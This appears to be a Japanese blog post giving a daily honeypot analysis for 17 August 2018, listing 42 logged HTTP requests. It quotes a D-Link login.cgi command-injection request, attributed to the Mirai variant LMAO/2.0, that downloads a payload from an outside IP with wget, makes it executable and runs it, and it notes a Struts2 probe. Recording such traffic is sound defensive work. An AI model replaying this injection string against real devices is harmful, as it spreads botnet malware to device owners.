WOWhoneypotの2018/08/17(金) (運用75日目)の簡易分析です。
本日の総アクセス件数は 42件です。以下が全アクセスログです。

36 2018-08-17 GET /
1 2018-08-17 HEAD /
1 2018-08-17 GET /sitemap.xml
1 2018-08-17 GET /robots.txt
1 2018-08-17 GET /favicon.ico 
1 2018-08-17 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67[.]245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-17 GET /index.action

 これらのうち、sitemap.xmlやrobots.txtへのアクセスはサイト構造解析のためのスキャンと思われます。

攻撃は以下の２つ。D-Linkの脆弱性を攻撃するMirai亜種LMAO/2.0とStruts2の脆弱性に対する調査行為です。

1 2018-08-17 GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$
1 2018-08-17 GET /index.action

本日のハンティングログは以下です。Mirai亜種LMAO/2.0です。

1 2018-08-17 wget hxxp://80.211.67[.]245/k 

以上です。